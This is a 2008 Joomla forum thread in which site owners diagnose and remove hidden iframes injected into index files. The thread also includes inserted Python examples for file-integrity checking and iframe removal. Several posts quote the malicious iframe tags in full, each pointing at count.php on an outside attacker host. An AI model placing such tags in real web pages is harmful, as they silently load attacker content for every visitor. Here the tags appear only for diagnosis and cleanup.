iframe infections - tmp directory exploit
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Sep 29, 2008 11:57 am
iframe infections - tmp directory exploit
Not sure if this has been addressed yet. But just in case....
A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit. It also happens to Joomla (both 1.x and 1.5x). It manifests itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes a url query (GET) to a count.php file. External website varies (depends on infected slaves/hosts) but can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>
To get rid of the url query, just delete the actual line in index.php (administrator/index.php).
More info in this link:
http://blog.floogy.com/2008/08/fix-pino ... cinfo.html
Any ideas how to block this out pre-emptively?
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
I've been seeing the effects of a similar attack. Part of the attack is now adding an @readfile() function call to include a file from "[modnote: cracker sites removed!]
What makes you think that this is related to the tmp directory?
I advise setting up Tripwire as a fallback to notify you if files have changed.
- astroboysoup
- Joomla! Enthusiast
- Posts: 233
- Joined: Tue May 27, 2008 3:20 am
- Location: Australia
- Contact:
Re: iframe infections - tmp directory exploit
We found a similar exploit here
http://safebrowsing.clients.google.com/ ... /index.php
Obviously that is the google diagnostic page of the site.
Peter
PB Web Development
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Sep 29, 2008 11:57 am
Re: iframe infections - tmp directory exploit
"Tmp directory exploit" - nothing more than the proposed idea in the referenced/linked blog entry and the fact that the write settings must have been circumvented. Anyway, if it's that easy to modify a file it's a fundamental threat. Thanks for the advice.
chroma99 wrote: quote including site references removed.
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: iframe infections - tmp directory exploit
You should NOT be using php4.. it's EOL already..
So, therefore, to protect yourself, use the latest stable of Joomla as well as php. As of now that is php5.2.6, Joomla 1.0.15 and Joomla 1.5.7
Brad Baker
https://xyzuluhosting.com
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Jun 18, 2007 11:22 pm
Re: iframe infections - tmp directory exploit
also note that it is happening with this address:
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
- alecrespi
- Joomla! Apprentice
- Posts: 30
- Joined: Wed Mar 29, 2006 3:22 pm
- Location: Italy
- Contact:
Re: iframe infections - tmp directory exploit
Hello everybody.
islatur wrote: also note that it is happening with this address:
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
My site http://www.ccancients.net has been infected with the trojan infection described in this post.
Following the instructions I've deleted the relevant line in INDEX.PHP (directory "administrator").
Recently I've also updated to Joomla 1.5.7.
Still, in the frontend I continue to see the browser trying to connect to "wsxhost.net".
I really have no idea on how to solve this... can somebody help me?
Thank you in advance
Alessandro
http://www.ccancients.net
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Sep 29, 2008 11:57 am
Re: iframe infections - tmp directory exploit
The line is infected in all index*.* files (index.php and index.html). If possible, download your site and do a search and replace on the string "http://wsxhost.net/count.php?o=2", replacing it with nothing (empty string). Then upload the files. That should do it. If you have SSH access (or Telnet) you can do this directly on the server (a faster track); pls consult your web provider for further instructions on this.
- ivanicus
- Joomla! Intern
- Posts: 72
- Joined: Fri Jul 06, 2007 6:15 am
- Location: Havana City, Cuba
- Contact:
Re: iframe infections - tmp directory exploit
Finally, does it infect 1.5.7 with php5+?????
Free speech for the dumb!
- fw116
- Joomla! Ace
- Posts: 1369
- Joined: Tue Sep 06, 2005 11:18 am
- Location: Germany
Re: iframe infections - tmp directory exploit
it can not infect php or joomla.
your problem is: weak directory and file permissions.
if you guys would check the documentation part of this website, you would find everything you need to secure your site...
start here :
http://docs.joomla.org/Security_and_Performance_FAQs
-
- Joomla! Intern
- Posts: 55
- Joined: Wed Oct 01, 2008 5:38 pm
Re: iframe infections - tmp directory exploit
And how much is Tripwire exactly??
chroma99 wrote: I've been seeing the effects of a similar attack. Part of the attack is now adding an @readfile() function call to include a file from "wsx3host.net", spam for amateur.zxchost.com and vessex.ru.
What makes you think that this is related to the tmp directory?
I advise setting up Tripwire as a fallback to notify you if files have changed.
AnarchyX67
John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
Do you have evidence for that, fw116?
fw116 wrote: your problem is : weak directory and file permissions.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
Available for the low cost of $0.
See here:
http://sourceforge.net/projects/tripwire
Anarchyx67 wrote: And how much is Tripwire exactly??
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
My current best guess is that this problem is due to a bug fixed in 1.0.15:
--------------- 1.0.15 Stable Released -- [22-February-2008 23:00 UTC] ---------------------
06-Feb-2008 Andrew Eddie
* SECURITY [HIGH level]: Fixed remote file inclusion vulnerability
-
- Joomla! Intern
- Posts: 55
- Joined: Wed Oct 01, 2008 5:38 pm
Re: iframe infections - tmp directory exploit
Thanks. And is there any way to use Tripwire with shared hosting at all? I don't see much on the subject and it looks like that link you gave mainly supplies just source code.
chroma99 wrote: Available for the low cost of $0.
See here:
http://sourceforge.net/projects/tripwire
Anarchyx67 wrote: And how much is Tripwire exactly??
AnarchyX67
John 3:16... <Yea yea, just go read it. Have you? No? Then go read it!!!> :-)
-
- Joomla! Apprentice
- Posts: 7
- Joined: Tue Mar 11, 2008 2:51 am
- Location: Ribeirão Preto, SP, Brazil
- Contact:
Re: iframe infections - tmp directory exploit
I'm from Brazil...
astroboysoup wrote: We found a similar exploit here
http://safebrowsing.clients.google.com/ ... /index.php
Google Chrome found almost the same exploit in my project, http://dfm.ffclrp.br/ldc
How do I get this diagnostic again?!?!
Weeks ago the University's server was hacked... Many deleted files...
I use Joomla 1.5.6 (will migrate to 1.5.7), the university uses php 5.2.4...
The extension Joomla Comment 3.2.4 gives this notice after 'request failure':
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><?xml version="1.0" standalone="yes"?><post><id>captchaalert</id><captcha><![CDATA[<a title="clique para uma nova imagem" href='javascript:JOSC_reloadCaptcha()'><img src="http://dfm.ffclrp.usp.br/ldc/components ... 617ce6b4e5" alt="Security Image" />
<input type="hidden" name="security_refid" value="a559f340b4c0fe0034fb0f617ce6b4e5" /></a>]]></captcha><noerror>1</noerror></post>
I installed Joomla Tools Suite... Nothing abnormal in the notices [Edit: got warnings in the tmp directory]. But it doesn't work correctly on 1.5.6...
Thx...
[]'s!
Last edited by Mox52 on Wed Oct 15, 2008 12:07 am, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
I can think of several ways it might work: if you can remotely mount the shared hosting filesystem, if the host provides you with shell access, etc.
I believe there are other software packages out there that do approximately the same thing as Tripwire; something else may work better in your situation.
Anarchyx67 wrote: Thanks. And is there any way to use Tripwire with shared hosting at all? I don't see much on the subject and it looks like that link you gave mainly supplies just source code.
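The file-change notification chroma99 recommends above can be had on shared hosting with nothing more than shell or cron access and a small script. The following is an added example, not code from the thread or from Tripwire: it hashes the site tree once as a baseline (stored outside the web root) and later reports modified, added and removed files; the sample site, file names and injected tag in demo() are constructed.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

# Constructed stand-in for the appended tag the thread describes; used only by demo().
INJECTED_TAG = '<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0></iframe>'

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root, skip_dirs=("cache", "tmp", "logs")):
    """Hash every file under root. Directories Joomla writes to in normal operation
    are skipped, otherwise every cache refresh would show up as a change."""
    root = Path(root)
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            p = Path(dirpath) / name
            baseline[p.relative_to(root).as_posix()] = sha256_of(p)
    return baseline

def save_baseline(baseline, path):
    # Keep this file outside the web root: whoever can append to index.php
    # could otherwise rewrite the baseline as well.
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)

def load_baseline(path):
    with open(path) as f:
        return json.load(f)

def compare(baseline, current):
    """Files modified, added or removed since the baseline, as sorted lists."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }

def check_site(root, baseline_path):
    """Entry point for a cron job: compare the live tree against the stored baseline."""
    return compare(load_baseline(baseline_path), build_baseline(root))

def demo():
    """Constructed two-file site: baseline it, then append the tag to index.php and
    drop a new file, the two changes the infections in this thread produce."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "site"
        (site / "administrator").mkdir(parents=True)
        (site / "index.php").write_text("<?php echo 'site'; ?></html>\n")
        (site / "administrator" / "index.php").write_text("<?php echo 'admin'; ?></html>\n")
        baseline_path = Path(tmp) / "baseline.json"  # outside the site tree
        save_baseline(build_baseline(site), baseline_path)
        with open(site / "index.php", "a") as f:
            f.write(INJECTED_TAG + "\n")
        (site / "count.php").write_text("<?php /* constructed dropped file */ ?>")
        return check_site(site, baseline_path)

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run build_baseline once after a known-clean install or restore, then schedule check_site from cron and mail yourself anything it returns.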
-
- Joomla! Apprentice
- Posts: 7
- Joined: Tue Mar 11, 2008 2:51 am
- Location: Ribeirão Preto, SP, Brazil
- Contact:
Re: iframe infections - tmp directory exploit
Question: how to fix it?
Thx!
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: iframe infections - tmp directory exploit
Search these forums? Read some of the recent threads? Restore from a backup?
Mox52 wrote: Question: how fix it?
Thx!
Brad Baker
https://xyzuluhosting.com
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Sep 29, 2008 11:57 am
Re: iframe infections - tmp directory exploit
To fix the problem is quite easy, but to prevent it is another bag....
To fix it: do a search&replace on the string "count.php?o=2". Replace the whole iframe tag with nothing, i.e. delete the tag. The tag is appended after the end tag (</html>), mainly in your index.php and index.html files.
There is a structural directory problem in almost all web applications, since the application (which is the same as everybody or the "world") needs rights to write to at least a configuration file (could possibly be remedied by storing all the credentials in a db table instead) and to the temp and cache directories.
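The search-and-replace clean-up described above, as an added example that is not code from the thread: it finds the hidden iframes pointing at count.php?o=2 in index.php and index.html files under a site root, reports them per file, and strips them (dry run unless told otherwise). The site layout and file contents in demo() are constructed.

```python
import re
import tempfile
from pathlib import Path

# Matches a hidden iframe whose src ends in count.php?o=2, the string the thread says to
# search for. Attribute order is not assumed, and the malformed variant from the first
# post (no '>' before </iframe>) is matched too, so the closing tag is optional.
INJECTED_IFRAME = re.compile(
    rb'<iframe\b[^>]*\bsrc="https?://[^"]*/count\.php\?o=2"[^>]*>(?:\s*</iframe>)?',
    re.IGNORECASE,
)

def find_injected(data):
    """Return every injected iframe tag found in the file contents (bytes)."""
    return INJECTED_IFRAME.findall(data)

def strip_injected(data):
    """Remove the injected tags; returns (cleaned_bytes, number_removed)."""
    return INJECTED_IFRAME.subn(b"", data)

def scan_site(root, names=("index.php", "index.html")):
    """Walk root and map each infected index file (relative path) to its tag count.
    Files are handled as bytes so a cleanup never re-encodes the rest of the file."""
    root = Path(root)
    hits = {}
    for name in names:
        for p in root.rglob(name):
            n = len(find_injected(p.read_bytes()))
            if n:
                hits[p.relative_to(root).as_posix()] = n
    return hits

def clean_site(root, dry_run=True):
    """Strip the tags from every infected index file; with dry_run=True only report."""
    root = Path(root)
    cleaned = {}
    for rel in scan_site(root):
        p = root / rel
        new_data, n = strip_injected(p.read_bytes())
        if not dry_run:
            p.write_bytes(new_data)
        cleaned[rel] = n
    return cleaned

def demo():
    """Constructed site: one index.php with two tags appended after </html> (as in the
    Joomla Comment output quoted in this thread) and one clean template index.html.
    Returns the scan before and after cleaning plus the cleaned index.php."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "templates" / "beez").mkdir(parents=True)
        (site / "index.php").write_bytes(
            b"<?php echo 'site'; ?></html>\n"
            b'<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" '
            b'frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
            b'<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0></iframe>\n'
        )
        (site / "templates" / "beez" / "index.html").write_bytes(b"<html></html>\n")
        before = scan_site(site)
        clean_site(site, dry_run=False)
        return before, scan_site(site), (site / "index.php").read_bytes()

if __name__ == "__main__":
    before, after, _ = demo()
    print("before:", before, "after:", after)
```

Run scan_site first and keep a copy of the reported files; stripping the tag removes the symptom, not whatever wrote it, so the integrity check and the upgrade advice in this thread still apply.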
-
- Joomla! Fledgling
- Posts: 2
- Joined: Tue Oct 14, 2008 4:52 pm
- Contact:
Re: iframe infections - tmp directory exploit
Thanks, using this information, I have managed to clear all my problems! Thanks tonnes.
-
- Joomla! Apprentice
- Posts: 7
- Joined: Tue Mar 11, 2008 2:51 am
- Location: Ribeirão Preto, SP, Brazil
- Contact:
Re: iframe infections - tmp directory exploit
Thx all!
Will read docs.joomla.org!!
Sorry for the signature!
Last edited by Mox52 on Wed Oct 15, 2008 4:32 pm, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 27
- Joined: Mon Feb 13, 2006 9:19 pm
Re: iframe infections - tmp directory exploit
I found these files of mine to be infected.
root/index.php
root/templates/ALL index files both .php and .html in ALL templates
root/administrator/index.php
root/templates//administrator/ALL index files both .php and .html in all templates
[Mod Note - removed reference to module alleged to be responsible - take this up directly with the developer and don't use these forums to name and shame]
But for the record I have the correct Joomla supported register globals and directory permission security settings on a reliable linux server.
We are using the latest and stable PHP 5 build.
We are only using 2 third-party plugins but they are common and known to be secure. Plus I locked them down.
In conclusion we still got hacked. So the cause is not PHP 4, PHP settings or folder permissions outside the scope of what Joomla recommends.
With that said I decided to make the templates directories unwritable. So we will lose the backend management flexibility, but oh well. Then I removed mod_analytics. I am looking forward to the day someone finds the culprit.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
Which Joomla version were you running when your website was infected?
elstinko wrote:I found these files of mine to be infected.
root/index.php
root/templates/ALL index files both .php and .html in ALL templates
root/administrator/index.php
root/templates//administrator/ALL index files both .php and .html in all templates
[Mod Note - removed reference to module alleged to be responsible - take this up directly with the developer and don't use these forums to name and shame]
But for the record I have the correct Joomla supported register globals and directory permission security settings on a reliable linux server.
We are using the latest and stable PHP 5 build.
We are only using 2 third-party plugins but they are common and known to be secure. Plus I locked them down.
In conclusion we still got hacked. So the cause is not PHP 4, PHP settings or folder permissions outside the scope of what Joomla recommends.
With that said I decided to make the templates directories unwritable. So we will lose the backend management flexibility, but oh well. Then I removed mod_analytics. I am looking forward to the day someone finds the culprit.
-
- Joomla! Fledgling
- Posts: 1
- Joined: Wed Oct 04, 2006 10:17 am
Re: iframe infections - tmp directory exploit
I'm having problems deleting the line in all the index files, some of them can not be edited online. How can I overwrite these files?
- ircmaxell
- Joomla! Ace
- Posts: 1926
- Joined: Thu Nov 10, 2005 3:10 am
- Location: New Jersey, USA
- Contact:
Re: iframe infections - tmp directory exploit
tmp directory exploit? BS! Even if a file is 777, there's no way to write to it from the outside on a properly configured server. All this hoopla about 777 is BS. If you share your server, yes, other users ON THE MACHINE ALREADY can edit those files. But someone from the outside CANNOT.
Show me a proof of concept that doesn't rely on another hole in an application (meaning a hole in Joomla, etc), and I'll believe that, but otherwise I really don't...
Anthony Ferrara - Core Team - Development Coordinator - Bug Squad - JSST
http://moovum.com/ - The Bird is in the air! Get Mollom Anti-Spam on your Joomla! website with Moovur...
http://www.joomlaperformance.com For All Your Joomla Performance Needs
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Sep 29, 2008 10:55 pm
Re: iframe infections - tmp directory exploit
I agree, which is why I believe the problem is due to the bug I mentioned earlier. After the upgrade to J! 1.0.15, the bad guys haven't been back.
ircmaxell wrote:tmp directory exploit? BS!
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Sep 29, 2008 11:57 am
Re: iframe infections - tmp directory exploit
You have to do it locally and then upload the files to your server.
huubrk wrote: I'm having problems deleting the line in all the index files, some of them can not be edited online. How can I overwrite these files?
If you have access to SSH (shell access) you can do it remotely, but there are some tricky commands to master. Ask your Web host for advice.
-
- Joomla! Apprentice
- Posts: 9
- Joined: Mon Jun 18, 2007 11:22 pm
Re: iframe infections - tmp directory exploit
I believe it was not joomla the source of the problem.
I got infected with the latest version 1.57, after reading up on the problem I ran across a solution here
http://blog.floogy.com/2008/08/fix-pino ... cinfo.html
after reading this I noticed that I was still using the old php which I updated with two clicks.
I got shell access from bluehost, ran a modified version of the command stated on the link above and it was done. All infections were gone.
Something I noticed from this spyware is that it infects every html file.... I had over 1000 files infected with the iframe. This will slow down your website and you might get blacklisted on google or stopbadware.org which is bad... very bad.
-
- Joomla! Apprentice
- Posts: 6
- Joined: Fri Aug 18, 2006 7:02 pm
Re: iframe infections - tmp directory exploit
Not only was my Joomla installation in one directory impacted, my ENTIRE hosting account was affected. That includes tens of sites and hundreds of directories. I disagree with the moderator's choice to censor the name of the plugin/module/component that might be responsible. I'm not interested in a witch hunt. I'm concerned that even after I correct hundreds of files, I will still be vulnerable without any clue of where this attack started.
In my opinion, the moderator is acting irresponsibly if indeed the cause of the vulnerability is known.
Do you know which third-party plugin/module/component might be responsible? Any help is appreciated!
Sam